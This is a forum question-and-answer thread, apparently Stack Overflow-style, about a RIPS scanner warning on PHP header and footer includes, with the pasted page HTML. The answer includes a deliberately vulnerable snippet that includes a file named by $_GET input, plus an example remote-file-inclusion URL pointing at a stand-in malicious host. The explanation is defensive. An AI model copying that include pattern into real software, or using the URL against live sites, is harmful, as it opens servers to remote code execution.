I have a header.php and a footer.php which I include into all other pages like home, contact, about us etc.
The way I included the header and the footer file is
<?php include 'inc/header.php';
some code
some code
include 'inc/header.php'; ?>
Everything simple and works fine.
I decided to check my project for vulnerability and downloaded RIPS scanner. After the scan, the result
Userinput reaches sensitive sink.
5: include include 'inc/header.php'; // header.php
requires:
5: if(!in_array($_GET['file'], $files)) else
which basically say that both header and footer are vulnerable and I should use
if(!in_array($_GET['file'], $files)) else
How come a simple include header and footer file be vulnerable? and if vulnerable, how should i implement if(!in_array($_GET['file'], $files)) else ??
header.php
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="icon" href="images/common/lbfavicon.ico" />
<meta name="author" content="example.com" />
<link rel="stylesheet" type="text/css" href="template/css/reset.css" media="screen" />
<link rel="stylesheet" type="text/css" href="template/css/layout.css" media="screen"/>
</head>
<body>
<div id="header-wrapper">
<div class="container">
<div id="nav">
<ul>
<li><a href="./">Home</a></li>
<li><a href="index.php?page=about">About</a></li>
<li><a href="index.php?page=contact">Contact</a></li>
</ul>
</div><!-- nav ends -->
</div><!-- container ends -->
</div><!-- header wrapper ends -->
<div id="header">
<div class="container">
<div id="logo">
<a href="./"><img src="template/images/logo.png" width="125" height="45" alt="logo" /></a>
</div><!-- logo ends -->
<div id="search">
<form method="get" action="searchresult.php">
<div class="form-item">
Search: <input type="text" maxlength="120" name="searchfor" />
</div>
</form>
</div><!-- search ends -->
</div><!-- container ends-->
</div><!-- header ends -->
<div class="container">
<div id="announcement">
<div id="breadcrumbs"></div>
</div><!-- announcement ends -->
<div id="pagewrapper">
Footer.php
<div id="bottom">
<div class="column">
<h2>Abc.com</h2>
<ul>
<li><a href="about">About</a></li>
<li><a href="contact">Contact</a></li>
</ul>
</div>
<div class="column">
<h2>Mode of payment</h2>
<ul>
<li>Credit/Debit card | Cheque | Demand draft</li>
</ul>
<h2>Get in touch</h2>
<ul>
<li><img src="template/images/facebook.png" width="32" height="32" alt="facebook" /></li>
</ul>
</div>
<div class="column">
<h2>Call us / Mail us</h2>
<ul>
<li>0-9999384745 / <a href="mailto:info@example.com">info@example.com</a></li>
</ul>
<h2>Share us</h2>
<ul>
<li><img src="template/images/facebook.png" width="32" height="32" alt="facebook" /></li>
</ul>
</div>
<div style="clear: both;"></div>
</div> <!-- bottom ends -->
<div id="footer">
</div>
</div> <!--Pagewrapper end-->
</div>
</body>
</html>
Well I suppose this is just a warning but in a global way, when you include .php scripts which names come from user input, you should absolutely check if the names provided are correct or not (to prevent security issues).
For example, a lot of websites use a "global" file that would include file according to requests coming from the user.
Example :
<?php
$get = $_GET['action'];
if ($get == "index") {
include "includes/index.php";
}
//...
else
{
include $get .".php";
}
Now let's imagine someone want to include some malicious script within your website. If your server allow cross-website requests, then people could specify some external script that could be dangerous for your server or the others users.
Example : ./global.php?action=http://malicious4ever.com/dirtything